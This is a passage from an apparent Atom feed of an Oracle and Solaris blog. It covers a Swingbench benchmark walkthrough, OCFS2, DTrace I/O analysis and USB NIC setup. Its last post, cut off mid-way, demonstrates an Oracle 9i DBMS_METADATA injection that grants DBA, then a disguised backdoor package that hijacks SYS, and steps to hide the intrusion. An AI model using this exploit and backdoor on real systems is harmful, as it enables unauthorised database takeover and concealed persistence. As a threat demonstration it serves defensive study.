&lt;p&gt;One quick section on how we will be enabling direct I/O for testing purposes. The UFS file system (as does most file systems) supports mounting the file system options which enable processes to bypass the OS page cache. One way to enable direct I/O on a UFS file system is to mount the file system with the &lt;code&gt;forcedirectio&lt;/code&gt; mount option as so: &lt;pre&gt;# mount -o forcedirectio /dev/dsk/c2t1d0s1 /u02&lt;/pre&gt; Another method which is possible is setting the &lt;code&gt;FILESYSTEMIO_OPTIONS=SETALL&lt;/code&gt; parameter within Oracle (available in 9i and later). As &lt;a href='http://blogs.sun.com/glennf/'&gt;Glenn Fawcett&lt;/a&gt; states in &lt;a href='http://blogs.sun.com/glennf/entry/where_do_you_cache_oracle'&gt;this excellent post&lt;/a&gt; on direct I/O, the &lt;code&gt;SETALL&lt;/code&gt; value passed to the &lt;code&gt;FILESYSTEMIO_OPTIONS&lt;/code&gt; parameters sets all the options for a particular file system to enable direct I/O or async I/O. When this parameter is set as stated, Oracle will use an API to enable direct I/O when it opens database files.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Swingbench Installation and Configuration&lt;/span&gt;
&lt;p&gt;Now that we&amp;#8217;ve got the preliminaries out of the way, its time to get on to the main reason for this post. The Swingbench code is shipped in a zip file which can be downloaded from &lt;a href='http://www.dominicgiles.com/downloads.html'&gt;here&lt;/a&gt;. A prerequisite for running Swingbench is that a Java virtual machine needs to be present on the machine which you will be running Swingbench on.&lt;/p&gt;

&lt;p&gt;After unzipping the Swingbench zip file, you will need to edit the &lt;code&gt;swingbench.env&lt;/code&gt; file (if on a UNIX platform) found in the top-level swingbench directory. The following variables need to be modified according to your environment: &lt;ul&gt;
	&lt;li&gt;&lt;code&gt;ORACLE_HOME&lt;/code&gt;&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;JAVA_HOME&lt;/code&gt;&lt;/li&gt;
	&lt;li&gt;&lt;code&gt;SWINGHOME&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt; If using the Oracle instance client software instead of a full RDBMS install on the machine you are running Swingbench, the &lt;code&gt;CLASSPATH&lt;/code&gt; variable must also be modified from &lt;code&gt;$ORACLE_HOME/jdbc/lib/ojdbc14.jar&lt;/code&gt; to &lt;code&gt;$ORACLE_HOME/lib/ojdbc14.jar&lt;/code&gt;.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Installing Calling Circle&lt;/span&gt;
&lt;p&gt;The Calling Circle is an open-source preconfigured benchmark which comes with Swingbench. The Order Entry benchmark also comes with Swingbench but for the purposes of this article, we will only discuss the Calling Circle benchmark.&lt;/p&gt;

&lt;p&gt;The Calling Circle benchmark implements an example OLTP online telecommunications application. The goal of this application is to simulate a randomized workload of customer transactions and measure transaction throughput and response times. Approximately 97 % of the transactions cause at least one database update, with well over three quarters performing two or more updates. More information can be found in the Readme.txt file which comes with the Swingbench software.&lt;/p&gt;

&lt;p&gt;The first step for installing Calling Circle is to create the Calling Circle schema (CC) in the database. This is achieved using the &lt;code&gt;ccwizard&lt;/code&gt; executable found in the &lt;code&gt;swingbench/bin&lt;/code&gt; directory . &lt;pre&gt;$ ./ccwizard&lt;/pre&gt; Click &lt;span&gt;Next&lt;/span&gt; on the welcome screen and you will then be presented with the screen shown on the below:&lt;/p&gt;
&lt;a href='http://4.bp.blogspot.com/_heUWGgTt1gk/STIJy46YGgI/AAAAAAAAA4k/ihrvixJyzhM/s1600-h/cc1.JPG' onblur='try {parent.deselectBloggerImageGracefully();} catch(e) {}'&gt;&lt;img src='http://4.bp.blogspot.com/_heUWGgTt1gk/STIJy46YGgI/AAAAAAAAA4k/ihrvixJyzhM/s400/cc1.JPG' id='BLOGGER_PHOTO_ID_5274288883479616002' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 268px;' /&gt;&lt;/a&gt;
&lt;p&gt;Choose the option to create the Calling Circle schema. In the next screen, enter the connection details of the database you will be creating the schema in. This will involve entering the host name, port number (if not using the default port of 1521 for your listener) and the database service name. Also, ensure that you choose the type IV Thin JDBC driver. Click &lt;span&gt;Next&lt;/span&gt; when you have entered this information.&lt;/p&gt;

&lt;p&gt;The next screen involves the schema details for the Calling Circle schema. Enter appropriate locations for the datafiles on your system. When finished entering information on this screen, click &lt;span&gt;Next&lt;/span&gt; to continue. This will bring you to the Schema Sizing window as shown below:&lt;/p&gt;
&lt;a href='http://2.bp.blogspot.com/_heUWGgTt1gk/STIKYmx3XTI/AAAAAAAAA4s/5cCmn4wE19w/s1600-h/cc2.JPG' onblur='try {parent.deselectBloggerImageGracefully();} catch(e) {}'&gt;&lt;img src='http://2.bp.blogspot.com/_heUWGgTt1gk/STIKYmx3XTI/AAAAAAAAA4s/5cCmn4wE19w/s320/cc2.JPG' id='BLOGGER_PHOTO_ID_5274289531447106866' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 216px;' /&gt;&lt;/a&gt;
&lt;p&gt;Use the slider to select the schema size you wish to use. For this post, I chose to use a schema size with 2,023,019 customers which implies a tablespace of size 2.1GB for data and a tablespace of size 1.3GB for indexes. When finished choosing your schema size, click &lt;span&gt;Next&lt;/span&gt; to continue. Click &lt;span&gt;Finish&lt;/span&gt; on the next screen to complete the wizard and create the schema. A progress bar will appear as shown below&lt;/p&gt;
&lt;a href='http://4.bp.blogspot.com/_heUWGgTt1gk/STIK0KMrsLI/AAAAAAAAA40/_6lpY2NkQns/s1600-h/cc3.JPG' onblur='try {parent.deselectBloggerImageGracefully();} catch(e) {}'&gt;&lt;img src='http://4.bp.blogspot.com/_heUWGgTt1gk/STIK0KMrsLI/AAAAAAAAA40/_6lpY2NkQns/s320/cc3.JPG' id='BLOGGER_PHOTO_ID_5274290004811296946' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 216px;' /&gt;&lt;/a&gt;&lt;span style='font-weight: bold;'&gt;Creating the Input Data for Calling Circle&lt;/span&gt;
&lt;p&gt;Before each run of the Calling Circle application it is necessary to create the input data for the benchmark to run. This is accomplished using the ccwizard program we used previously for creating the Calling Circle schema. Start up the ccwizard program again and click &lt;span&gt;Next&lt;/span&gt; on the welcome screen. On the &amp;#8220;Select Task&amp;#8221; screen show previously, this time select to &amp;#8220;Generate Data for Benchmark Run&amp;#8221; and click &lt;span&gt;Next&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;In the &amp;#8220;Schema Details&amp;#8221; window which follows, enter the details of the schema which you created in the last section. Click &lt;span&gt;Next&lt;/span&gt; once all the necessary information has been entered. You will then be presented with the &amp;#8220;Benchmark Details&amp;#8221; screen as shown below:&lt;/p&gt;
&lt;a href='http://3.bp.blogspot.com/_heUWGgTt1gk/STILE_DDDvI/AAAAAAAAA48/KTrL5Upydjs/s1600-h/cc4.JPG' onblur='try {parent.deselectBloggerImageGracefully();} catch(e) {}'&gt;&lt;img src='http://3.bp.blogspot.com/_heUWGgTt1gk/STILE_DDDvI/AAAAAAAAA48/KTrL5Upydjs/s320/cc4.JPG' id='BLOGGER_PHOTO_ID_5274290293875871474' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 217px;' /&gt;&lt;/a&gt;
&lt;p&gt;In this post, we will use 1000 transactions for each test as seen in the &amp;#8220;Number of Transactions&amp;#8221; dialog window above. Press &lt;span&gt;Next&lt;/span&gt; to continue and you will be presented with the final screen. Click &lt;span&gt;Finish&lt;/span&gt; to create the benchmark data.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Starting the Benchmark Test&lt;/span&gt;
&lt;p&gt;Now that we have the Calling Circle schema created and the input data generated, we can start our tests. To start up Swingbench and ensure that it operates with the Calling Circle benchmark we can pass the sample Calling Circle configuration file (&lt;code&gt;ccconfig.xml&lt;/code&gt;) which is supplied with Swingbench as a runtime parameter as so: &lt;pre&gt;$ ./swingbench -c sample/ccconfig.xml&lt;/pre&gt; This will start up Swingbench with the sample configuration for the Calling Circle application but only a few settings need to be changed for is to use this configuration. All that needs to be changed is the connection settings for the host you have already setup the Calling Circle schema on. Change the connection settings as necessary for your environment.&lt;/p&gt;

&lt;p&gt;The following screen shot show the Calling Circle application running in Swingbench:&lt;/p&gt;
&lt;a href='http://1.bp.blogspot.com/_heUWGgTt1gk/STILZ5Z99TI/AAAAAAAAA5E/nsyz4cLLO3Y/s1600-h/cc6.JPG' onblur='try {parent.deselectBloggerImageGracefully();} catch(e) {}'&gt;&lt;img src='http://1.bp.blogspot.com/_heUWGgTt1gk/STILZ5Z99TI/AAAAAAAAA5E/nsyz4cLLO3Y/s320/cc6.JPG' id='BLOGGER_PHOTO_ID_5274290653138646322' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 203px;' /&gt;&lt;/a&gt;
&lt;p&gt;We will be performing 1000 transactions during each test run as specified when we generated the sample data. The Swingbench configuration we will be using for every test we perform is as follows:&lt;/p&gt;
&lt;a href='http://3.bp.blogspot.com/_heUWGgTt1gk/STILqWF5wWI/AAAAAAAAA5M/BaEBxRorHJU/s1600-h/tab1.JPG' onblur='try {parent.deselectBloggerImageGracefully();} catch(e) {}'&gt;&lt;img src='http://3.bp.blogspot.com/_heUWGgTt1gk/STILqWF5wWI/AAAAAAAAA5M/BaEBxRorHJU/s320/tab1.JPG' id='BLOGGER_PHOTO_ID_5274290935717020002' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 56px;' /&gt;&lt;/a&gt;
&lt;p&gt;This workload is typical of an OLTP application with 40% reads and 60% writes. The number of users associated with the workload is 15. We will use this exact workload for every test we perform.&lt;/p&gt;
&lt;span style='font-weight: bold;'&gt;Results &amp;amp; Conclusion&lt;/span&gt;
&lt;p&gt;The measurements from Swingbench which we will use for comparing the performance of a UFS file system when Oracle uses direct I/O versus buffered I/O are the following: &lt;ul&gt;
	&lt;li&gt;Transaction throughput (number of transactions per minute)&lt;/li&gt;
	&lt;li&gt;Average response time for each transaction type&lt;/li&gt;
&lt;/ul&gt; We will perform a run of the benchmark 5 times for each configuration we want to compare and then present the average of the measurements below. So we will run the tests 5 times with buffered I/O and then 5 times with un-buffered I/O by setting the &lt;code&gt;FILESYSTEMIO_OPTIONS&lt;/code&gt; parameter.&lt;/p&gt;

&lt;p&gt;So the comparisons from these 2 measurements are as follows:&lt;/p&gt;
&lt;a href='http://4.bp.blogspot.com/_heUWGgTt1gk/STIMDvZVpMI/AAAAAAAAA5U/UNq_9k2HGN4/s1600-h/tab2.JPG' onblur='try {parent.deselectBloggerImageGracefully();} catch(e) {}'&gt;&lt;img src='http://4.bp.blogspot.com/_heUWGgTt1gk/STIMDvZVpMI/AAAAAAAAA5U/UNq_9k2HGN4/s320/tab2.JPG' id='BLOGGER_PHOTO_ID_5274291372006155458' border='0' alt='' style='margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 55px;' /&gt;&lt;/a&gt;
&lt;p&gt;While these tests were not very conclusive or thorough, they do show how Swingbench can be used for generating database activity. The measurements which I compared are only some of the measurements which Swingbench reports when finished running a benchmark. Hopefully I will be able to play and post a bit more on the excellent Swingbench utility in the future.&lt;/p&gt;</content>
 <feedburner:origLink>http://posulliv.github.com//2008/11/25/playing-with-swingbench.html</feedburner:origLink></entry>
 
 <entry>
   <title>OCFS2 Mount by Label Support</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/71Gr1lxxlkU/ocfs2-mount-by-label-support.html" />
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2008/11/25/ocfs2-mount-by-label-support</id>
   <content type="html">&lt;p&gt;While messing around with OCFS2 on my RHEL4 install, I discovered that if I created an OCFS2 filesystem with a label, I was unable to mount it by that label. I would encounter the following:&lt;/p&gt;
&lt;span style='font-family: courier new;'&gt;# mount -L "oradata" /ocfs2&lt;/span&gt;&lt;strong style='font-family: courier new;'&gt;mount: no such partition found
&lt;/strong&gt;
&lt;p&gt;I found this quite strange and did some investigation. The version of util-linux that was present on my system after a fresh RHEL 4 install was &lt;em&gt;-&lt;/em&gt;&lt;em&gt; util-linux-2.12a-16.EL4.6.&lt;/em&gt;&lt;/p&gt;
&lt;em /&gt;
&lt;p&gt;So I grabbed the latest version of util-linux from Red Hat and viola, I am now able to mount an OCFS2 filesystem by its label.&lt;/p&gt;

&lt;p&gt;The current version of util-linux on my system is - &lt;em&gt; util-linux-2.12a-16.EL4.20.&lt;/em&gt;&lt;/p&gt;</content>
 <feedburner:origLink>http://posulliv.github.com//2008/11/25/ocfs2-mount-by-label-support.html</feedburner:origLink></entry>
 
 <entry>
   <title>Observing Oracle I/O Access Patterns with DTrace</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/7zO2akEa1TY/observing-oracle-io-access-patterns-with-dtrace.html" />
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2008/11/25/observing-oracle-io-access-patterns-with-dtrace</id>
   <content type="html">In this post, I will use the &lt;code&gt;seeks.d&lt;/code&gt; and &lt;code&gt;iopattern&lt;/code&gt; DTrace scripts, which are available as part of the &lt;a href="http://www.opensolaris.org/os/community/dtrace/dtracetoolkit/"&gt;DTraceToolKit&lt;/a&gt; (This toolkit is an extremely useful collection of scripts created by &lt;a href="http://www.brendangregg.com/"&gt;Brendan Gregg&lt;/a&gt;), to view the I/O access patterns typical of Oracle. DTrace is able to capture data throughout the kernel and so the job of finding access patterns has been greatly simplified.&lt;br&gt;

The system on which these examples are being run has redo logs on one disk, datafiles on another disk and the control file is on another disk.&lt;br&gt;

To get system-wide access patterns, the &lt;code&gt;iopattern&lt;/code&gt; script can be used. Sample output is as follows:

&lt;pre&gt;
# ./iopattern
%RAN %SEQ  COUNT    MIN    MAX    AVG     KR     KW
100    0      7   4096   8192   7606      4     48
0    0      0      0      0      0      0      0
0    0      0      0      0      0      0      0
100    0      6   8192   8192   8192      0     48
0    0      0      0      0      0      0      0
0    0      0      0      0      0      0      0
100    0      6   8192   8192   8192      0     48
0    0      0      0      0      0      0      0
0    0      0      0      0      0      0      0
100    0      6   8192   8192   8192      0     48
0    0      0      0      0      0      0      0
&lt;/pre&gt;

This output was generated on an idle system (0.04 load). You can see that the &lt;code&gt;iopattern&lt;/code&gt; script provides the percentage of random and sequential I/O on the system. During this monitoring period while the system was idle, all the I/O was random. The iopattern script also provides the number and total size of the I/O operations performed during the sample period, and it provides the minimum, maximum, and average I/O sizes.&lt;br&gt;

Now, look at the output generated from the &lt;code&gt;iopattern&lt;/code&gt; script during a period of heavy database load:

&lt;pre&gt;
# ./iopattern
%RAN %SEQ  COUNT    MIN    MAX    AVG     KR     KW
92    8     69   4096   8192   6589    304    140
86   14     69   4096   8192   5995    228    176
82   18     67   4096   8192   5257     64    280
84   16     19   4096   8192   6036     40     72
77   23     22   4096   8192   4282      0     92
88   12     68   4096 1015808  21744   1120    324
97    3     67   4096   8192   7274    400     76
89   11     66   4096   8192   6392    276    136
90   10     71   4096   8192   6345    216    224
87   13     62   4096   8192   5879    184    172
90   10     10   4096   8192   6553     40     24
100    0     17   8192   8192   8192     88     48
87   13     33   4096 1048576  38353   1168     68
86   14     65   4096   8192   6049    236    148
&lt;/pre&gt;

As you can see from the above output, the majority of the I/O which occurs during this period is random. In my mind, this one indication that the type of I/O typical in an OLTP environment is random (as we would expect).&lt;br&gt;

To get the I/O distribution for each disk, the &lt;code&gt;seeks.d&lt;/code&gt; script can be used. This script measures the seek distance for disk events and generates a distribution plot. This script is based on the &lt;code&gt;seeksize.d&lt;/code&gt; script provided with the DTraceToolKit and is available in the &lt;a href="http://www.solarisinternals.com/"&gt;Solaris Internals&lt;/a&gt; volumes.&lt;br&gt;

Sample output from the &lt;code&gt;seeks.d&lt;/code&gt; script is show below:

&lt;pre&gt;
# ./seeks.dTracing... Hit Ctrl-C to end.^C
Tracing... Hit Ctrl-C to end.
^C

cmdk0
        value  ------------- Distribution ------------- count
           -1 |                                         0
            0 |@@@@@@@@@@@@@@@@@@@@@                    43
            1 |                                         0
            2 |                                         0
            4 |                                         0
            8 |                                         0
           16 |                                         0
           32 |                                         0
           64 |                                         0
          128 |@@@@@@@@@@@@@                            26
          256 |@@@@@@                                   12
          512 |                                         0

sd1
        value  ------------- Distribution ------------- count
        32768 |                                         0
        65536 |@@@@@@@@@@@@@@@@@@@@                     1
       131072 |                                         0
       262144 |                                         0
       524288 |                                         0
      1048576 |@@@@@@@@@@@@@@@@@@@@                     1
      2097152 |                                         0
&lt;/pre&gt;

This output was generated when the system was idle as before. This output summarizes the seeks performed by each disk on the system. The &lt;code&gt;sd1&lt;/code&gt; disk in the output above is the disk on which my Oracle datafiles reside. The value column in the output indicates the size of the seek that was performed in bytes. This indicates some random I/O on this disk since the length of the seeks are quite large. The disk on which the redo logs are located does not show up in the output above since no I/O is being generated on that disk (&lt;code&gt;sd2&lt;/code&gt;).

Now, it is interesting to look at the output generated from the &lt;code&gt;seeks.d&lt;/code&gt; script during a period when the database is under a heavy load.

&lt;pre&gt;
# ./seeks.d
Tracing... Hit Ctrl-C to end.
^C

cmdk0
        value  ------------- Distribution ------------- count
           -1 |                                         0
            0 |@@@@@@@@@@@@@@@@@@@@@@@                  18
            1 |                                         0
            2 |                                         0
            4 |                                         0
            8 |                                         0
           16 |                                         0
           32 |                                         0
           64 |                                         0
          128 |@@@@@@@@@@@@@                            10
          256 |@@@@@                                    4
          512 |                                         0

sd2
        value  ------------- Distribution ------------- count
           -1 |                                         0
            0 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@           430
            1 |                                         0
            2 |                                         0
            4 |                                         0
            8 |@@@@@@@@                                 120
           16 |@                                        11
           32 |                                         3
           64 |                                         0
          128 |                                         0
          256 |                                         0
          512 |                                         0
         1024 |                                         0
         2048 |                                         0
         4096 |                                         0
         8192 |                                         0
        16384 |                                         0
        32768 |                                         0
        65536 |                                         6
       131072 |                                         0

sd1
        value  ------------- Distribution ------------- count
          512 |                                         0
         1024 |@@@                                      31
         2048 |                                         5
         4096 |                                         0
         8192 |                                         0
        16384 |                                         0
        32768 |                                         0
        65536 |@@                                       23
       131072 |@@@@@@@@                                 92
       262144 |@@@@@@@                                  73
       524288 |@                                        6
      1048576 |                                         4
      2097152 |@                                        14
      4194304 |@@@                                      29
      8388608 |@@@@                                     40
     16777216 |@@@@@                                    56
     33554432 |@@@@@@                                   65
     67108864 |                                         0
&lt;/pre&gt;

This time the disk on which the redo logs are located shows up as there is activity occurring on it. You can see that most of this activity is sequential as most of the events incurred a zero length seek. This makes sense as the log writer background process (LGWR) writes the redo log files in a sequential manner. However, you can see that I/O on the disk which contains the Oracle datafiles is random as seen by the distributed seek lengths (up to the 33554432 to 67108864 bucket).&lt;br&gt;

The above post did not really contain any new information but I thought it would be cool to show a tiny bit of the possibility that DTrace has. This is one of the coolest tools I have used in the last year and is one of the many reasons why I have become a huge Solaris fan!
</content>
 <feedburner:origLink>http://posulliv.github.com//2008/11/25/observing-oracle-io-access-patterns-with-dtrace.html</feedburner:origLink></entry>
 
 <entry>
   <title>Installing &amp; Configuring a USB NIC on Solaris</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/_wHbB8-SjJ4/installing-configuring-a-usb-nic-on-solaris.html" />
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2008/11/25/installing-configuring-a-usb-nic-on-solaris</id>
   <content type="html">&lt;p&gt;In this post, I will provide a very quick overview of how to install and configure a USB network interface on Solaris.&lt;/p&gt;
&lt;span style='font-size:130%;'&gt;&lt;span style='font-weight: bold;'&gt;Obtaining the USB Driver&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;The driver for a generic USB network interface which should cover the majority of USB NIC devices can be downloaded from &lt;a href='http://homepage2.nifty.com/mrym3/taiyodo/upf-0.8.0.tar.gz'&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;span style='font-size:130%;'&gt;&lt;span style='font-weight: bold;'&gt;Installing the USB Driver&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;After downloading the driver, uncompress the gunzipped file and extract the archive as the root user.&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;# gunzip upf-0.8.0.tar.gz ; tar xvf upf-0.8.0.tar&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;This will create a &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;upf-0.8.0&lt;/span&gt;&lt;/span&gt; directory in the current directory. Change to the &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;upf-0.8.0&lt;/span&gt;&lt;/span&gt; directory. Now we need to perform the following to install the driver:&lt;/p&gt;
&lt;span style='font-size: 85%; font-family: courier new;'&gt;# make install
# ./adddrv.sh&lt;/span&gt;
&lt;p&gt;After this has been completed, the driver has been installed but the system needs to be rebooted before we can use the new driver. Reboot the system using the following procedure:&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;# touch /reconfigure&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; # shutdown -i 0 -g0 y&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;This will scan for new hardware on reboot. The new NIC device will show up as &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;/dev/upf0&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;span style='font-size:130%;'&gt;&lt;span style='font-weight: bold;'&gt;Configuring the NIC Device&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;Once the USB driver has been installed and the system has been rebooted correctly, the NIC device can be configured as follows. (In this example, we will just make up an IP address to use).&lt;/p&gt;
&lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;# ifconfig upf0 plumb&lt;/span&gt;
&lt;span style='font-family: courier new;'&gt; # ifconfig upf0 192.168.2.111 netmask 255.255.255.0 up&lt;/span&gt;&lt;/span&gt;&lt;span style='font-size:130%;'&gt;&lt;span style='font-weight: bold;'&gt;Making Sure the NIC Device Starts on Boot&lt;/span&gt;&lt;/span&gt;
&lt;p&gt;To ensure that the new NIC device starts automatically on boot, we need to create a &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;/etc/hostname&lt;/span&gt;&lt;/span&gt; file for that interface containing either the IP address configured for that interface of if we placed the IP address in the &lt;span style='font-size:85%;'&gt;&lt;span style='font-family: courier new;'&gt;/etc/inet/hosts&lt;/span&gt;&lt;/span&gt; file, then the hostname for that interface.&lt;/p&gt;</content>
 <feedburner:origLink>http://posulliv.github.com//2008/11/25/installing-configuring-a-usb-nic-on-solaris.html</feedburner:origLink></entry>
 
 <entry>
   <title>Installing a Back Door in Oracle 9i</title>
   <link href="http://feedproxy.google.com/~r/posulliv/~3/3T0yvbDlWGY/installing-a-back-door-in-oracle-9i.html" />
   <updated>2008-11-25T00:00:00-08:00</updated>
   <id>http://schacon.github.com//2008/11/25/installing-a-back-door-in-oracle-9i</id>
   <content type="html">In this post, we will demonstrate a way an attacker could install a back door in a 9i Oracle database. The information on this post is based on information obtained from &lt;a href="http://www.petefinnigan.com/"&gt;Pete Finnigin's website&lt;/a&gt; and the &lt;a href="http://www.2600.com/"&gt;2600 magazine&lt;/a&gt;. The version of the database we are using in this post is:

&lt;pre&gt;
sys@ORA9R2&gt; select * from v$version;
BANNER
----------------------------------------------------------------
Oracle9i Enterprise Edition Release 9.2.0.4.0
PL/SQL Release 9.2.0.4.0 - Production
CORE 9.2.0.3.0 Production
TNS for Linux: Version 9.2.0.4.0 - Production
NLSRTL Version 9.2.0.4.0 - Production
&lt;/pre&gt;

&lt;h2&gt;Creating the User&lt;/h2&gt;
In this example, we will create a user that we will install the back door with. We will presume that either an attacker has already gained access to this account or that a legitimate user wishes to install a back door in our database (the so called inside threat). The user we will install the back door as is testUser. &lt;span style="font-family: georgia;"&gt;We will only grant &lt;code&gt;CONNECT&lt;/code&gt; and &lt;code&gt;RESOURCE&lt;/code&gt; to this user.

&lt;pre&gt;
sys@ORA9R2&gt; create user testUser identified by testUser;

User created.

sys@ORA9R2&gt; grant connect, resource to testUser;

Grant succeeded.

sys@ORA9R2&gt; connect testUser/testUser
Connected.
testuser@ORA9R2&gt; select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
-------- ------------ --- --- ---
TESTUSER CONNECT      NO  YES NO
TESTUSER RESOURCE     NO  YES NO

testuser@ORA9R2&gt;
&lt;/pre&gt;

&lt;h2&gt;Gaining DBA Privileges&lt;/h2&gt;

Now we will use a known exploit in the 9i version of Oracle that will allow this user to obtain the DBA role. This exploit is described in the document 'Many Ways to Become DBA' by &lt;a href="http://www.petefinnigan.com/"&gt;Pete Finnigan&lt;/a&gt;. This exploit invloves creating a function and then exploiting a known vulnerability in the DBMS_METADATA package.

&lt;pre&gt;
testuser@ORA9R2&gt; create or replace function testuser.hack return varchar2
2 authid current_user is
3 pragma autonomous_transaction;
4 begin
5 execute immediate 'grant dba to testUser';
6 return '';
7 end;
8 /

Function created.

testuser@ORA9R2&gt; select sys.dbms_metadata.get_ddl('''||testuser.hack()||''','')
2 from dual;
ERROR:
ORA-31600: invalid input value '||testuser.hack()||' for parameter OBJECT_TYPE in
function GET_DDL
ORA-06512: at "SYS.DBMS_SYS_ERROR", line 105
ORA-06512: at "SYS.DBMS_METADATA_INT", line 1536
ORA-06512: at "SYS.DBMS_METADATA_INT", line 1900
ORA-06512: at "SYS.DBMS_METADATA_INT", line 3606
ORA-06512: at "SYS.DBMS_METADATA", line 504
ORA-06512: at "SYS.DBMS_METADATA", line 560
ORA-06512: at "SYS.DBMS_METADATA", line 1221
ORA-06512: at line 1

no rows selected

testuser@ORA9R2&gt; select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
-------- ------------ --- --- ---
TESTUSER CONNECT      NO  YES NO
TESTUSER DBA          NO  YES NO
TESTUSER RESOURCE     NO  YES NO

testuser@ORA9R2&gt;
&lt;/pre&gt;

As you can see from the output above, the attacker has now gained the DBA role. Now, the attacker can start working on installing the back door.

&lt;h2&gt;Creating and Installing the Back Door&lt;/h2&gt;
Now, he/she can save what the encrypted form of the SYS user's password is before installing the back door.

&lt;pre&gt;
testuser@ORA9R2&gt; select username, password
2 from dba_users
3 where username = 'SYS' ;

USERNAME PASSWORD
-------- ------------------------------
SYS      43CA255A7916ECFE

testuser@ORA9R2&gt;
&lt;/pre&gt;

Now, the attacker wants to install the back door as the SYS user so he/she alters the password of the SYS user so they can connect as the SYS user. The attacker will then change this password back to the saved password once finished installing the back door.&lt;br&gt;

&lt;pre&gt;
testuser@ORA9R2&gt; alter user sys identified by pass;
User altered.
testuser@ORA9R2&gt; connect sys/pass as sysdba
Connected.
testuser@ORA9R&gt;
&lt;/pre&gt;

Now the attacker is connected as the SYS user and starts on creating the back door. The attacker creates the back door like so:

&lt;pre&gt;
testuser@ORA9R2&gt; CREATE OR REPLACE PACKAGE dbms_xml AS
2 PROCEDURE parse (string IN VARCHAR2);
3 END dbms_xml;
4 /
Package created.
testuser@ORA9R2&gt;
CREATE OR REPLACE PACKAGE BODY dbms_xml AS
PROCEDURE parse (string IN VARCHAR2) IS
var1 VARCHAR2 (100);
BEGIN
IF string = 'unlock' THEN
SELECT PASSWORD INTO var1 FROM dba_users WHERE username = 'SYS';
EXECUTE IMMEDIATE 'create table syspa1 (col1 varchar2(100))';
EXECUTE IMMEDIATE 'insert into syspa1 values ('''||var1||''')';
COMMIT;
EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY padraig';
END IF;
IF string = 'lock' THEN
EXECUTE IMMEDIATE 'SELECT col1 FROM syspa1 WHERE ROWNUM=1' INTO var1;
EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY VALUES '''||var1||'''';
EXECUTE IMMEDIATE 'DROP TABLE syspa1';
END IF;
IF string = 'make' THEN
EXECUTE IMMEDIATE 'CREATE USER hill IDENTIFIED BY padraig';
EXECUTE IMMEDIATE 'GRANT DBA TO hill';
END IF;
IF string = 'unmake' THEN
EXECUTE IMMEDIATE 'DROP USER hill CASCADE';
END IF;
END;
END dbms_xml;
/

testuser@ORA9R2&gt; CREATE PUBLIC SYNONYM dbms_xml FOR dbms_xml;

Synonym created.

testuser@ORA9R2&gt; GRANT EXECUTE ON dbms_xml TO PUBLIC;

Grant succeeded.

testuser@ORA9R2&gt;
&lt;/pre&gt;

This package does the following (examples will be shown below):
&lt;ul&gt;
	&lt;li&gt;It can unlock the SYS account by changing the password to a known password (in this case 'padraig').&lt;/li&gt;
	&lt;li&gt;Then, it can revert the SYS account's password back to the original password.&lt;/li&gt;
	&lt;li&gt;It can create a new user account with a known password that has the DBA role which can later be dropped from the database.&lt;/li&gt;
&lt;/ul&gt;

The attacker has now created a back door that can be very difficult to discover. The attacker has chosen a name for the package that looks like it was installed with the Oracle database. Now, the attacker changes the SYS user's password back to its original value to prevent the DBA from noticing that the SYS account has been hijacked. The attacker will also revoke the DBA role from his/her user account to prevent detection. This role is no longer need by the attacker since he/her has installed the back door.&lt;br&gt;

&lt;pre&gt;
testuser@ORA9R2&gt; alter user sys identified by values '43CA255A7916ECFE';

User altered.

testuser@ORA9R2&gt; revoke dba from testUser;

Revoke succeeded.

testuser@ORA9R2&gt; disconnect
Disconnected from Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 - Production
testuser@ORA9R2&gt; connect testUser/testUser
Connected.
testuser@ORA9R2&gt; select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS
-------- ------------ --- --- ---
TESTUSER CONNECT      NO YES NO
TESTUSER RESOURCE     NO YES NO
&lt;/pre&gt;

